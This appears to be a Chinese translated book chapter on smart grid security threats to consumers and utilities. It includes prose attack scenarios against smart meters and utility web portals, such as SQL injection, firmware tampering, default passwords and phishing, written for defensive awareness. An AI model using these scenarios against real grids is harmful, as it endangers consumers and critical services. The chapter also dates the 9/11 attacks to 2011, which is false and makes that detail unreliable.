1)非恶意动机 不是每个黑客入侵系统都有恶意的企图。有些黑客的入侵行为是被通过安全 系统的挑战和对设备工作方式的好奇心所驱使。对于这些黑客而言,系统的安全 性和操作方式是一个需要被解开的谜题。智能电网组件,比如智能仪表和智能设 备,会延伸到消费者家里,并连接到他们的家庭网络。物理上容易接触会进一步诱 使人们入侵智能电网组件。其他动机,比如自我表现和同伴认同,会驱使黑客使用 智能电网作为获得快乐和自我实现的方式。尽管这些黑客或许没有恶意企图,但 他们的行为会不经意地给消费者造成不良影响。 2)测试计算机系统安全 严格信息安全计划通常包括经常的安全检测,从而识别影响环境安全形势的 漏洞。这种检测的目的是提升整体的安全形势,智能电网安全计划也应该包括这 类安全检测。专业的安全检测人员,或者有道德的黑客,会采取预警措施来阻止测 试期间造成的负面影响;然而,风险并不仅仅存在于测试的过程中。在2007年,国 土安全局泄露出了一次安全测试的录像,在录像中,安全测试者能够入侵一个电厂 的发电设备。安全测试者成功的利用了一个现在被称作极光漏洞的漏洞,仅仅使 用数据的方法就使得发电设备自毁成一团黑烟。 这个测试发生在一个实验室中, 因此被破坏的发电设备没有对消费者造成负面影响。然而,如果这个测试发生在 实际的发电环境下,消费者很可能会经历一次断电事件。提示当执行安全测试时,事先确定行动规则来减少测试的风险是非常必要的。组织和 安全测试者都要在执行测试前达成一致并签署行动规则。如果想了解更多关于行 动规则模板的信息,请参看NISTSP 800-115 的附录 B:“信息安全测试和评估的技术指导”,它可以在 http://csrc.nist.gov/publications/nistpubs/800-115/SP800- 115.pdf 找到。 3)个人利益—金钱收入和权利 有些黑客企图利用智能电网获取金钱和权利。黑客能利用多种工具和方法直接 从消费者手里敲诈钱财或行使权利。 一种手段是使用一种被称作赎回软件的恶意软 件集,也被称作勒索软件。恶意软件,也被称作恶意代码或恶意程序,指的是可能危害到受害者数据、应用、操作系统机密性、完整性或可用性,或者令受害者厌烦或干扰 受害者的,通常情况下采取隐蔽方式植入系统的程序。恶意软件通常包括以下几类: 病毒 蠕虫 特洛伊木马 恶意移动代码 混合攻击(几种类型的组合) 赎回软件指的是一种将系统或数据作为人质来向所有者或用户索取赎金的特 殊恶意软件。通常情况下,赎回软件会停止某项特殊服务、使用户不能使用系统、阻止对关键数据的访问、或者以上几种情况的组合。例如,Gpcode 病毒加密用户 文件并要求用户向黑客汇款来解密这些文件。[6]另一个例子是 RansomSMS-AH 病毒,它能够组织互联网接入,进而强迫用户向某个付费(premium rate)SMS号码 发送一个短信息,这样黑客就有了收入来源。为了从用户手中勒索钱财,黑客会将这些技术应用于智能电网组件中。特别 地,黑客会获得消费者的智能电表控制权,并干扰用户接入电力系统。然后,黑客 可以通过传统的邮件向受害者发送一条赎回短信,来为恢复消费者的电力到正常 水平索取一定数量的赎金。 4)复仇和报复 邻居间和熟人间的不和可能会升级为智能电网攻击。假设一个简单的场景, 爱丽丝觉得她的邻居鲍勃的电视声音开得过大。尽管爱丽丝几次要求鲍勃将音量 调小些,鲍勃还是继续在一个令人厌烦的音量下看电视。所以,爱丽丝决定通过鲍 勃家安装的智能仪表的远程切断功能来切断他的电力供应,这样就能达到彻底降 低鲍勃家电视音量的作用了。在当前的电网情况下,最简单的报复方式是物理攻击。如果爱丽丝决心切断鲍勃 的电力供应,她可以用蛮力切断通往鲍勃家的输电线路。在智能电网中,这种攻击仍然 有效;然而,在智能电网环境下,爱丽丝很有可能不用离开她舒适的家就能达到同样的 目的。如果爱丽丝采取了预防措施,她能够不在鲍勃的智能电网设备留任何物理指纹, 并且不在涉及到的系统和网络上留下任何电子指纹的情况下,完成这次攻击。 2.3.3 恐怖主义 出于各种各样的政治原因,世界各国对于如何定义恐怖主义这个词还存在争 议。 一个常见的定义是联合国给出的,“任何意图通过造成平民或非武装人员死亡 或严重人身伤害来恐吓某一群体,或强迫政府或国际组织实施或停止实施某种行 为的行动都构成恐怖主义。”[8]在恐怖主义背后有多种动机,组织所使用的各式标 签大多数表达的是同样的主题。 一个恐怖主义分类的例子包括国家分裂主义、宗 教原教旨主义、新宗教和社会革命。]无论动机和分类如何,智能电网很可能成为 恐怖主义的目标。通过攻击电网,恐怖分子能够影响大量的人口,并且以此吸引对 于他们行为动机的广泛关注。尽管对于智能电网的数字化威胁是一种很主要的关 注点,但类似爆炸的暴力行为仍然是一种可行的攻击途径。 针对智能电网的数字化攻击或许不会是恐怖袭击的主要目标,更多情况是它为 了其他目的而实施的。在2011年9月11日针对世界贸易中心、五角大楼和宾夕法尼亚州郊区的攻击过程中和攻击之后,美国居民能够通过电视、收音机和互联网了解 信息。在未来,攻击可能以大范围的切断消费者到电力系统的连接作为开始,进而阻 止对主要目标的预警和信息更新,而主要目标可能是一次爆炸或其他物理攻击。 1)生态恐怖主义 根据恐怖主义的分类,生态恐怖主义属于社会革命的一种。智能电网的愿景 之一是使得电网能够更好地处理清洁的可再生能源;然而,被认为对环境有害的传 统类型能源仍然会被使用。为了增进生态恐怖主义的主张被人了解,他们会以降 低或完全切断消费者的电能使用来攻击智能电网。 2.3.4 政府 政府既是消费者,又是对其他消费者的威胁。从红绿灯到实验室,政府部门要消费 大量的电力,而他们和个人一样易受到本章描述的各种威胁的影响。然而,政府对一般 消费者而言,也可能是一种威胁。战争和强制实施条例都会使政府成为消费者的威胁。 1)战争 毁坏一个国家关键性的基础设施会极大地妨碍一个国家的正常运行,因此,在 战争中,智能电网很可能成为攻击目标。传统的战争武器,比如炸弹,在智能电网 完成部署后,仍然会在干扰电力的配电和传输时显得极为有效。尽管如此,在智能 电网普及后,电子战争的风险很可能会提升。现在的电网已经很容易受到电子攻 击,而在智能电网中,对科技更大的依赖会增加受到电子攻击的风险。当被问及当 前电网被外国间谍潜入的报告时,美国国土安全秘书Janet Napolitano说:“这个漏洞我们已经知晓数年了,”但他也承认,“我们必须承认……在这个世界上,在一个逐步电子化的世界里,这些风险在增大。‘’ 2)非法活动 电力有许多用途,但是并不是所有的用途在每个国家都被认为是合法的。例 如,制造和使用大麻在美国的大部分州和世界许多国家是非法的。生产大麻的一 个被称为 grow-cps 的方法,这种方法包括大麻原料的室内种植。由于这种方法对 光的较大需求,被用于 grow-ops 的建筑会显著的比其他类似建筑消耗更多的电 力。因此, 一些电力公司会和执法部门联合寻找潜在的 grow-ops 地点。由于智能 电网能够提供更加精确的使用数据,它会极大地方便通过使用数据定位和阻止非 法活动。尽管大多数人不会同情 grow-ops 或其他非法活动的操作者,这些非法活 动的操作者会把智能电网当作他们活动的威胁。政府部门会使用从智能电网收集 的数据来确定和逮捕这些操作者。 2.3.5 电力公司 电力公司,或者更准确地说,电力公司员工,会通过有意或无意的行为成为消 费者的威胁。从事故到内部人员威胁,电力公司员工仍然是造成电力干扰、隐私泄 露、错误账单和其他事故的原因之一。 1)事故威胁 如本章“自然发生的威胁”部分中图2.1描述的,在2009年前三季度,人为失 误造成了四起电力干扰事故。更进一步讲,人为失误导致了2006年和2007年接 近10%的电力干扰事故。尽管逐步完善的自动化会减少人为失误造成的事故, 操作者、维护者和雇员仍然需要和智能电网交互。增加定期的培训并增加员工的 休息时间会降低产生事故的风险,然而,这类事故仍然是智能电网运行和维护中的 一个重大威胁。 2)补丁管理 绝大多数(如果不是所有)组织一直努力完成补丁管理并且随着蠕虫、病毒、木 马持续的威胁,许多公司仍然在这么做。为企业中所有的系统部署补丁或升级操 作系统、硬件和应用并不总是一帆风顺的。通常情况下,补丁在某些目标系统中不 能被正确的安装。这会造成许多后果。例如,对智能仪表一次不成功的硬件升级 会导致消费者收到错误的账单,或者切断他们家中的电力供应。随着智能仪表和 其他智能设备被部署到消费者的设施中并连接到互联网,补丁管理会成为电力消 费者的安全威胁,而这种威胁在当前的电网中是不存在的。 3)蓄意攻击 电力公司雇员蓄意攻击消费者看起来似乎是违反常理的,但是确实有多种导 致雇员攻击消费者的情况出现。愤怒的雇员冲击工作地点并不是一个新的概念。 负面的绩效评估、不充足的补偿方案、即将来临的裁员或者与管理部门的争吵是比 较常见的使得雇员冲击雇主的原因,这可能间接的导致对于消费者的负面冲击。 也有一些情况可能导致雇员直接攻击消费者。例如,爱丽丝打电话到电力公司的 服务热线来讨论之前一个月的账单问题。鲍勃, 一个账户服务技术人员,收到了爱 丽丝的电话并试图解释这份账单。然而,爱丽丝对于在用电高峰时的高电价极其愤怒,并朝鲍勃怒吼。结果是,鲍勃决定通过远程切断爱丽丝的电源作为报复。 提示 实现最小特权原则并尽可能地实施责任分离可能会阻止鲍勃切断爱丽丝的供电。 如果鲍勃仅仅负责收集账单错误,他就不具有切断爱丽丝供电的能力。 4)减载 当电力的需求大于供给时,电力公司会采取减载技术。结果是,电力公司会降 低或完全切断部分消费者的电力供应。电力公司会采取减载来保证优先用户,比 如应急服务,仍然有电力供应。然而,那些不被优先的用户可能会失去供电,这会 对他们的生活造成负面影响。 2.4 对消费者的影响 当和非技术的管理人员谈话时,安全专家不能直接使用诸如缓冲区溢出之类 的术语来阐述他们需要额外预算来修复被识别漏洞的原因。通常情况下,管理人员对事件对商业运行的影响更感兴趣。在大多数情况下,漏洞的影响会各不相同, 并且这种影响只能被粗略估计。例如, 一个攻击者可以利用智能仪表的缓冲区溢 出攻击来获得对智能仪表完全的控制。攻击者可能利用这个漏洞来关闭某栋房屋 的电力供应,或者他们可以利用这个漏洞来切断应急服务的电力供应,这会产生更 大的影响。结果是,安全专家有时因为将影响描述成世界末日而被指责为恐惧贩 子。与其他情况类似, 一次针对智能电网的成功攻击的影响有时可能是仅仅令人 厌烦,但有时缺可能关乎性命。 2.4.1 隐私 在高级量测体系的实现中,智能电表会自动的收集大量的信息并将信息传送 到电力公司、消费者和第三方服务提供商。这些数据可能包含侵害个人隐私的个 人识别信息(Personally Identifiable Information)。根据一项为NIST 进行的隐私影响分析(Privacy Impact Analysis)中的描述,“数 据项会从分布式的能源资源处(Distributed Energy Resources)被收集,并且智能仪表 会显示不同类型的关于居民消费者和居民活动的数据。”12]详尽的电能使用信息会 给个人和组织了解消费者的习惯提供帮助。隐私专家,包括隐私的未来论坛(FPF-www.futureofprivacy.org),已经表示了对智能电网中被收集的数据的关注。如 图2.3所示,分析家们能够通过分析当前的电力负载得知什么设备正在运行。 许多消费者会意识到收集和分析这类数据带来的潜在影响。他们并不会把这些信 息与某个实际的威胁联系起来。但是,如前文“智能窃贼和跟踪者”部分中所描述的,恶 意人员会利用消费者个人识别信息来对消费者实施盗窃,跟踪和其他恶意行为。 尽管黑客有多种为了恶意企图利用个人识别信息的方法,但各个公司还是希 望能正当的利用这些信息。具体来讲,广告公司会高度重视这些个人信息。利用 目标投放广告来盈利的搜索引擎也被认为是一个类似的例子。例如,当你在搜索 微波炉历史的时候,销售微波炉的商场广告会出现在你的浏览器中。类似地, 一个 电力公司可以将针对某一邮编号码的匿名的、或者仅仅是他们认为匿名的使用信 息销售给广告公司。这些广告公司通过分析电力使用数据来描述出该地理区域的 消费者习惯。广告公司可以将这些结果卖给当地希望进行目标广告投放的企业。 尽管不像智能窃贼那样危险,这些例子确实代表了一些消费者对个人隐私的顾虑。 2.5 对可用性的影响 跟传统电网相比,智能电网会引入新的特点和优势,但是智能电网的主要目的仍然是保证消费者的用电。既然如此,在本章“消费者威胁”部分提到的大多数威胁仍然会 影响电力的可用性。这些影响小到更改加热器和空调的温度,大到限制紧急服务。 2.5.1 个人可用性 在电力公司或政府是否有权利任意控制消费者电力使用这一问题上仍存在争论。根本上,这要看你在哪里使用电力。由电力公司或政府官方远程控制消费者 能源消耗的功能确实存在,并且仍将被安装在消费者的家和工作地点,正如大不列 颠所做的那样。 2.5.2 移动性 现在技术的难题之一是如何有效地存储过量的电能转而在用电高峰使用他 们。然而,广泛流行的电动汽车可能会解决这个问题。电动汽车需要连接到电网 进行充电。如果智能电网遇到了一个超过当前发电供应能力的需求,电力公司会 从连接到电网上的电动汽车上获取额外的电能。尽管这或许会满足电力公司的需 求,但依赖于电动汽车的消费者却需要使用额外的时间来为他们的汽车充电。 2.5.3 应急服务 大多数关键的应急服务,比如生命支持医疗系统,依赖于稳定的电力进行工 作。隐私和温度控制对于某些消费者来说可能并不重要,但应急服务的正常运行 状态对于他们却是至关重要的。医院、应急响应小组、警察局和消防队每天都要挽救性命,而他们要依赖于电力供应来完成自己的职责。应急服务通常有自己的发 电设备和其他备用电源来预防电力中断;然而,这些备用计划通常只能应对短期的 电力中断。在一个长期的电力中断事件中,这些应急服务的运行能力会被极大地 限制。这个现象在通过电力医疗设备保证重症病人存活的医院是非常明显的。 2.6 经济影响 本章提到的威胁很可能给消费者造成极大的经济影响。智能电表中被破坏的 数据会导致不准确的账单,导致消费者超额支付他们的电力消费。许多消费者可 能没有注意到他们的超额支付行为,然而,有些消费者会要求自己的电力账单被修 正。如果电力公司检测到一个工作不正常的仪表,他们会愿意修正错误的账单。 反之,电力公司可能对于被高估的智能仪表的功能过分自信而拒绝相信他们收集 到的是被破坏的数据。于是,他们继续要求消费者超额支付他们的电力账单。 电力的中断也会极大影响商业的正常运行,甚至可能升级到毁灭股票市场的 程度。在2003年8月,美国的东北部和中西部,以及加拿大东南部的部分地区遭 受了一次电力中断。这次电力中断影响到了预计五千万人并且在美国持续了四 天,在加拿大持续了一周。在美国和加拿大,销售业和制造业估计的经济损失均在 40亿到100亿美元之间。[15 2.7 攻击的可能性 根据爱达荷国家实验室(Idaho National Laboratory)关键性基础设备保护与 恢复中心为美国能源局所做的报告,智能电网技术中的漏洞或许在当前不会增加 国家安全风险。但是,这是因为目前智能电网尚未进行大规模的部署。类似地,当 前消费者面对的风险也相对较低,因为大多数消费者尚未接入智能电网。智能电 网的漏洞相对而言是不值得被利用的,也不会对消费者产生较大影响。然而,随着 这项技术进一步普及,消费者的风险会极大的增加。 2.8 总结 消费者会继续极大的依赖于电力网络来支持日常生活的各个方面。连接到智 能电网的消费者会继续面临传统的对于消费者依赖的电力可用性的威胁,比如自 然灾害和战争。然而,智能电网增加的网络间的互联会增加消费者受到电子威胁 的风险。消费者会完全依赖电力公司和主管部门来保证系统的安全,来阻止或减 少这些威胁带来的负面影响。然而,消费者也能通过实际行动来部分的保证自己 的用电安全,包括选择更好的密码和仔细阅读电力公司的隐私政策。 面向公用事业公司的安全威胁与影响 那些对电力公司、企业和政府造成影响的威胁。这其中 的某些威胁是类似的,某些是独有的,但是对电力公司、 企业和政府的攻击会比对消费者的攻击造成更广泛的 影响。 这些威胁被分解为 CIA 三元组的部分,机密性、完整 性和可用性。这些威胁的影响将以 一种假 设的格式呈现。然而,这些威胁和它们的影响却很容易 成为现实。在某些情况下,它们已经成为现实。 3.1 机密性 当希望保护信息不被未授权者获取时,信息需要具有机密性。机密性信息的 丢失对消费者造成的影响很大大。然而,电力公司拥有的大量收集来的消费者个 人信息使得他们成为了黑客们更大的目标。 3.1.1 消 费 者 隐 私 电力公司收集并存储消费者信息,比如姓名、地址、社会保障号和消费数据,这 些数据你我都希望能够保密。破坏机密性来获取这些信息是许多黑客的目标,正 如 Verizon Business 的2009年数据破解调查报告中(Verizon Business’2009 Data Breach Investigations Report)中所述,“……犯罪分子不得不彻底检查他们的攻击 过程并差异化他们的产品来保证盈利。在2008年,这是通过瞄准集中或聚合后的 数据实现的……” 但是,黑客或许并不是唯一想得到这些信息的人。随着智能电网技术被采用, 消费者会更频繁地通过互联网网页应用来与电力公司交互。这些应用会允许消费 者监视和控制他们的电能消耗,甚至控制他们的智能设备。执法部门可以利用这 些信息来协助调查,正如今天使用的移动电话中的 GPS 数据一样。 注意 Christopher Soghoian 在2009年12月1日发表的关于安全和隐私博客中指出, Sprint, 一家美国无线运营商,在2008到2009年向执法部门提供客户的 GPS 位置 数据。在超过13个月的时间里,Sprint 通过一个特别的网页入口向不同的执法部 门提供了超过8百万次的客户GPS 位置信息。 1)个人识别信息(Peronally Identifiable Information,PII) 智能电网给消费者带来了大量的威胁。虽然我们之前讨论了 针对个人的威胁及其影响,然而,由电力公司保存的消费者数据的机密性对于黑客 来说比危害某个单独消费者的数据机密性要有更大的诱惑。 场景 (1)威胁:黑客能够危害由 HackMe 电力公司运营的消费者数据库。 (2)攻击途径:HackMe 网站中用于消费者管理自己账户、监管电力使用和付 款的页面存在一个SQL 注入漏洞。 (3)影响:黑客获得了500000个 HackMe 客户的个人识别信息(PII) 。 这些信 息包括客户姓名、地址、生日、社会保障号和账号。对于那些使用自动或在线付款 的客户,黑客还获得了他们的信用卡号和银行账户信息。黑客将这些信息放到黑 市上出售,而 HackMe 的客户则只能自己处理后果。政府部门、监管团体和客户被 这次信息危害所激怒,而电力公司由于没能恰当地保护这些信息而被处罚。 注意 SQL 注入是一种通过向客户应用送往后端数据库服务器的数据中插入恶意 SQL 语句进行的攻击。这种攻击使得攻击者能够使用数据库应用程序操控数据。通常 情况下,这些数据库中包含了注入用户姓名、密码、信用卡信息、社会保障号及其他 信息。读者可以在 http://www.owasp.org/index.php/SQL_Injection 或者 Jus- tin Clarke的《SQL 注入攻击与防御》(ISBN:978-1-59749-424-3)上了解更多关于 SQL 注入的信息。 2)消费数据 我们之前在前一章“非法活动”部分谈到了执法部门如何利用消费者信息来判 断电力公司的消费者是否将电力用于非法生产。然而,执法部门对数据的其他用 途,包括使用类似信息来确定疑犯正在犯罪的地点。 场景 (1)威胁:在消费信息被反复用作犯罪起诉之后,消费者被剥夺了使用智能电网的权利。 (2)攻击途径:执法部门检查疑犯的历史消费信息来确定疑犯在犯罪时处在 自己住所的可能性。 (3)影响:消费者对于宣称的信息误用的强烈反对会迫使电力公司更改他们 的智能电网部署。这些修改会给电力公司造成极大的经济负担,并且公众的强烈 反对会减缓智能电网被接纳的速度。 3.1.2 专有信息 电力公司所拥有的有价信息并不仅仅是消费者的个人识别信息。专有信息, 比如交易秘密,也会成为那些有能力将这些信息售卖给处于竞争关系的政府或恐 怖组织的黑客的攻击目标。 场景 (1)威胁:对于被联合国实施制裁的某国政府,利用它本国的黑客来危害一家 美国的电力公司并获得交易秘密。这些交易秘密会使得该国政府能够不受到制裁 的影响而极大地提升它的发电能力。 (2)攻击途径:攻击可以利用放置在电力公司网页上的工具来有效地利用未 能及时打补丁的某个流行的浏览器的漏洞。当一个电力公司的雇员访问该页面 时,漏洞被利用,恶意软件被安装在他们的系统中。这种恶意软件允许该国政府的 黑客获得电力公司内部网络的访问权并最终窃取发电的交易秘密。 (3)影响:该国政府能够不顾联合国施加的处罚而增加发电量。受害电力公 司由于交易秘密被在网络上公布而失去了竞争优势。电力公司的盈利会极大下 降,而它的竞争者会缩小以前由于交易秘密造成的差距。 3.2 完整性 当需要保护信息不被未授权的人修改时,需要为信息提供完整性保护。信息 缺失完整性对电力公司的影响最大,可能导致诈骗和服务窃取。 3.2.1 服 务 诈 骗 不管具体的电力公司采用的是哪种部署架构,他们的消费者都具有访问部署 在他们家庭和工作地点的智能仪表的能力。虽然篡改防御机制已经被部署到智能 电网中,黑客的应对措施无疑也会被公布到网络上。 一旦关于如何攻击智能仪表的信息被公布到网络上,从黑客到好奇的消费者 都会具有欺诈他们电力公司的能力。有些人会窃取服务,而其他人会敢于通过欺 骗系统使之相信住户在产生电力而不是消费电力来从电力公司骗取金钱。 1)服务窃取 智能仪表干扰最可能造成的对于电力公司的威胁是通过瞒报数据窃取服务。 鉴于当前的经济情况,对于普通消费者而言,显著地降低电力账单听起来是难以抗拒的诱惑。 场景 (1)威胁:消费者侵入他们的智能仪表来修改发送到电力公司的使用信息。 (2)攻击途径:当智能仪表内的有漏洞的网络设备驱动程序被恰当的利用时, 能够允许执行远程代码。消费者下载并安装定制的利用漏洞的软件并将定制的固 件安装在智能仪表上。 (3)影响:消费者能够向电力公司瞒报自己的使用数据。于是,消费者降低了 自己的账单费用而电力公司不知不觉地资助了消费者。 2)网络测量 对于消费者而言,针对智能仪表最有利可图的篡改是操纵网络测量数据。网 络测量允许消费者将自己通过类似风能和太阳能技术产生的电量提供给电力公 司。作为回报,电力公司或者向消费者提供账户信用额度,或者为消费者提供的电 力开出支票。 场景 (1)威胁:消费者侵入他们的智能仪表来修改发送到电力公司的发电数据。 (2)攻击途径:智能仪表安全外壳(Secure Shell,SSH)提供管理接口,而极易 被猜测的密码会提供消费者对于设备的完全访问能力,包括对网络测量数据的访 问。消费者可以使用从网络上下载的工具来修改数据。 (3)影响:消费者能够过高的报告他们提供给电力公司的电量。于是,消费者 获得了更高的信用,甚至是一张更高额的电力公司的支票,而电力公司并不知道他 们白白付给了消费者支票。 注意 在2005年能源政策条例1251段中,美国国会要求所有的电力公司必须为消费者 提供网络测量功能。[3] 3.2.2 传感器数据操控 智能仪表中会安装允许电力公司执行大量任务的传感器,这些任务的范围从 向电力重建系统发送事后取证分析,到配电网络的监控、恢复和自修复。然而,如 果传感器中数据的完整性被破坏了,那么结果很可能是灾难性的。 场景 (1)威胁:布雷特, 一名自学成才的黑客,对于智能电网的工作方式感到好奇。 作为一名高中生,布雷特和父母生活,而他父母的房子最近被安装了智能仪表。布雷特花了很多个小时来研究智能仪表并最终写出了一个为他所有邻居发送错误传 感器数据的程序。 (2)攻击途径:传感器数据以一种未加密的形式从智能仪表被传送到电力公 司。布雷特利用这种不安全的配置来获取、操控并成功的传输虚假的传感器数据到电力公司。他也能够捕获邻居智能仪表的网络流量并获取他们的IP 地址。使 用定制编写的程序,布雷特能向电力公司发送虚假的传感器信息,提示自己的附近 地区失去了电力供应。 (3)影响:不确定区域断电原因的电力公司,会派人进行调查。带着疑问来到 该区域的工作人员会向电力公司报告并没有发生电力中断。电力公司低估了事件 的重要性而仅仅将它记录为一次系统的错误运转。觉得这个情景很有趣的布雷 特,在接下来的两年中多次实施了同样的攻击,最终电力公司因此损失了价值数千 美元的人力。 3.3 可用性 当需要保护电力公司的服务不受到未授权的中断时,需要实现可用性。可用 性的缺失对于电力公司和依靠电力公司服务的人有极大的影响。这包括消费者、 组织、企业和政府。 3.3.1 以消费者为目标 消费者会成为针对他们家庭供电的可用性攻击的目标。这些攻击很可能来自 “脚本小子”或者受害者认识的人。尽管这些攻击者的本意相对而言是无害的,但 他们行为的影响还是可能给他们的受害者带来极大的危害。 注意 “脚本小子”一词用来描述那些使用其他人制造的工具来攻击计算机或其他网络设 备的人。这是一个贬义词,通常指某些以博取恶名为目的的、技术不精未成熟的攻 击者。 场景 (1)威胁:卡拉的前男友,安迪,想要报复和他分手的卡拉。安迪有能力攻击 卡拉的智能仪表来对卡拉家制造持续低电压。 (2)攻击途径:卡拉家默认的无线路由配置使得安迪能够很容易地接入她的 无线网络并连接到她智能仪表的网页前端。 一旦获得了对智能仪表的访问权限, 安迪就能更改它默认的密码并切断卡拉家的电力供应。 (3)影响:卡拉家造成了断电。由于她的无线网络不能使用而且她不知道新 的访问密码,这使得她不能连接到她的智能仪表来恢复供电。 提示 有没有想过你自己设备的默认密码是什么?或者别人拥有的设备的默认密码? Phenoelit-US.org保存了一份包括最新自动售货机默认密码的列表,参考网页 http://www.phenoelit-us.org/dpl/dpl.html。 3.3.2 以组织为目标 同消费者一样,组织也会成为攻击者攻击组织所在区域电力可用性的目标。 这些攻击会来自“脚本小子”、专业黑客或者组织认识的人。然而,与对消费者的攻 击不同,这些攻击者的意图大多是恶意的并且可能导致敲诈。 1)电力公司 电力公司是攻击智能电网的黑客们最明显的组织目标。电力公司对于攻击者 来说是代表了目标中的“圣杯”。“脚本小子”会为了出名尝试危害电力公司,而专 业黑客或许是受资助的并且具有更恶意的动机。我们会稍后来了解这些动机。 场景 (1)威胁: 一个有前科的“脚本小子”,麦克,想要得到他认为他应得的认可和 名声。他联系了最大的黑客团体之一,询问自己如何能够加入。他们的回复是麦 克必须侵入国家最大的电力公司之一并造成一场足以被晚间新闻播报的断电。 (2)攻击途径:渴望加入排外的黑客团体的麦克,仔细研究了智能电网基础设 施并将当地的电力公司作为攻击目标。利用他当地电力公司本地管理站的弱小的 物理安全措施,麦克能够直接接入管理站并获得电力公司内部网络的访问权。自 此,麦克对所有当地子网的管理站实施了拒绝服务攻击(DoS)。 (3)影响:所有麦克居住地方的管理站都受到了他拒绝服务攻击的冲击。如 麦克准确计划的攻击那样,工作设备在电力公司等待获取用户数据时被破坏。随 后,电力公司的收费程序被延迟,官方在当地媒体向消费者公布这次延迟信息。虽 然没有提到这次攻击,麦克还是向黑客团体展示了攻击能力并获得了会员资格。 2)其他组织 和消费者、电力公司一样,电力公司之外的其他组织也会成为可用性攻击的目 标。攻击者很可能是“脚本小子”或者与组织有某种关系的人,比如前雇员或者顾 客。这些攻击的目的很可能是报复或者敲诈。 场景 (1)威胁:维克多,当地加油站的前雇员,想要为最近被解雇而实施报复。维 克多还是一名计算机内行并且之前负责加油站的付账工作,他有能力切断他之前 雇主的电力供应。 (2)攻击途径:加油站使用的是当地电力公司提供的在线账户管理网页应用 来付账。这个网页应用允许顾客不提供任何额外的认证而关闭账户。维克多要做 的仅仅是在家登录到网页应用,使用他在加油站工作时曾用过的相同的登录名和 密码并要求关闭账户。 (3)影响:加油站的账户在一周之内被关闭了。结果是,加油站在一个假日周 末被停止了供电。加油站不得不使用他们的备用系统,但由于对油量的大量需求,备用系统的电能很快就被用干了。由于是假日周末,电力公司直到下一个周二才 能派人来检查故障。当地的加油公司被迫在周日正午关闭,在他们一年中生意最好的几天之一停止销售。此外,电力公司由于不能向加油站供电而失去了收入,并 且还需要花时间来恢复加油站的供电。 3.3.3 垂直目标 在前面的部分,我们经历了攻击指定组织的场景。这些攻击是愤怒的雇员或 野心勃勃的“脚本小子”为了报复或出名实施的。然而,另一类不同的攻击者,处于 不同的动机会将特殊的行业作为攻击目标来实现他们的目的。这些攻击的影响会 比针对特定组织的影响大的多。 1)激进主义分子 许多组织不顾某些激进主义分子的反对而继续从事某些产业。 一个典型的例 子是皮毛大衣生产商。动物权利组织曾经采取了他们力所能及的所有措施来阻止 这些制造商继续运行他们的产业。智能电网的采用向这些激进主义分子提供了新 的攻击制造商的途径。 场景 (1)威胁:丽莎, 一位长期致力于动物保护的人士,还是一名计算机科学专业的 学生。在学校的动物权利抗议活动中,她被激进主义分子招募,在皮毛生产商为假期 消费季节到来做准备的时候,丽莎对三家最高产的皮毛品牌制造商的运营进行攻击。 (2)攻击途径:使用钓鱼邮件,丽莎能够在每一个目标生产商的计算机上安装 恶意软件。这些恶意软件捕获了账户部门使用的所有页面的登录名和密码,并将 他们发送给丽莎。 一旦丽莎获取了制造商使用的电力公司网页应用的登录名和密 码,她要做的只是在生产高峰期要求每个制造商的账户暂停服务。丽莎也对账户 信息和密码提示问题进行了修改,用以防止制造厂轻而易举地恢复他们的账户。 (3)影响:制造商在生产高峰时期经历了电力中断。他们联络电力公司咨询 中断原因并得知账户被暂停。尽管有备案信息,他们还是不能成功的向电力公司 认证自己而不得不提供补充的信息来重新激活服务。当电力服务被完全修复时, 制造商已经失去了整整三天的产量,这极大地影响他们满足市场需求的能力。 3.3.4 市场操控 经济利益仍然是造成计算机攻击最大的单独驱动力。随着智能电网的采用, 攻击者会利用其弱点获取经济利益。勒索是攻击者获取经济利益最简单的方式: 通过占有组织的电力供应直到收到赎金。但是,仍然存在更精妙、更有利可图的攻 击方式。 1)金融 常见的电影情节把黑客描述成被经济利益驱使的个人,他们将特殊的技能带 入某个包括非技术成员的小组。不幸的是,不久后这些情节不会仅仅局限在银幕上了。黑客与某些得金融市场的人合作,能够轻而易举在短时间内利用智能电网 来获取数目可观的金钱利益。 场景 (1)威胁:丹, 一名工作在金融机构的老资格的有道德的黑客,由于公司裁员被 迫离开。许多期货部门的同事接近他来谈一个快速赚钱的方法。由于没有看到很好 的正式工作的机会,丹答应以分得收入的一部分作为报酬来帮助他之前的同事。 (2)攻击途径:使用丹的技术知识和他同事的市场知识,丹在冬天的用电高峰 期对几个国家的最大的电力公司实施了拒绝服务攻击。丹利用的是一个远程文件 包含漏洞,这个漏洞在一个通常被作为电力公司网页应用的一部分来部署的软件 包中非常常见。这个漏洞使得丹可以中断所有电力公司的发电活动几个小时。 (3)影响:丹以前的同事在丹对电力公司的攻击前,有计划地购买了大量的燃 用油。在由于拒绝服务攻击造成的期货市场的骚动中,燃用油的价格急剧攀升,价 格增幅达到了35%。丹的同事们在骚动的最高点立刻抛售了他们手中的燃用油, 并赚够了一笔足以让他们安度晚年的钱。 3.3.5 以国家安全为目标 随着2009年8月美国宣布为智能电网进行了100项总计34亿美元的资助,奥巴马 总统将智能电网技术放在优先发展位置的事实已经非常明显。4作为总统优先发展的 项目,智能电网技术毫无疑问的会被应用到下一代的智能电网基础设施中。此外,对于 智能电网的优先发展会增加各方对其安全性的监视,包括来自朋友的和敌人的。 1)国内 从美国人目睹了1995年4月19日俄克拉荷马城的艾尔弗雷德·P· 默里联 邦大楼恐怖袭击后,国内恐怖主义就成为了他们不得不忍受的现实。智能电网的 采用会给国内恐怖分子提供一个极具吸引力的攻击目标。 场景 (1)威胁:凯尔, 一名曾经的二等兵,被自己国家宣称要占领别国的行为激怒 了。在他服役期间,他学会了如何攻击敌方基础设施,包括支持的电力公司。 (2)攻击途径: 一个互联网的政府网站运行着软件版本过期的网页服务器,凯 尔最终获得了一个控制美国东海岸区域配电敏感网络的权限。凯尔通过利用过期 的网页服务器,以及敏感网络与面向互联网的网页服务器间无数子网的较弱的安 全配置,获得了访问权限。 (3)影响:凯尔中断关闭美国东北部各州的发电。恐慌之后是联邦、州以及各 地区仓促地公布持续低电压事故原因。 警告 在你评估一家公司或一个政府的安全性前,确定你熟知所有的有关法律。法律和 随 之 而 来 的 惩 罚 措 施 会 因 地 域 不 同 而 变 化 。 在 http://www.nesl.org/default.aspx?tabid=13494 你可以阅读更多关于各州法律的信息。类似地,你可 以在http://definitions.uslegal.com/c/computer-hacking/ 得到相关的联邦法律。 2)国际 如同1995年俄克拉荷马城爆炸事件的影响一样(如图3.2),美国人民心中的 